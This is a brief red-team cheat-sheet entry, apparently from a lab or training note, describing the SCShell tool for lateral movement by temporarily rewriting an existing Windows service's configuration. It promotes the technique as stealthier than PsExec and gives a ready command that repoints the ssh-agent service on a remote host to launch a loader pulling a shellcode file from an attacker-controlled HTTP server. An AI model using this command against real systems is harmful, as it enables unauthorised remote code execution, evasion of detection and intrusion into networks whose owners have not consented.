SCShell

SCShell can be used as a stealthier alternative to PsExec for RCE. It leverages the ChangeServiceConfigA API to temporarily modify an existing service's configuration, execute the specified payload, and then restore the original service settings. Since it avoids creating new services and doesn't rely on network shares or SMB, it offers improved operational security compared to PsExec.

# Modify the service's path to achieve RCE
scshell -t 80 dcorp-adminsrv ssh-agent 'c:\windows\system32\cmd.exe /c start /b c:\windows\temp\binloader.exe <http-server-IP> <port> dcorp-adminsrv_tcp.bin'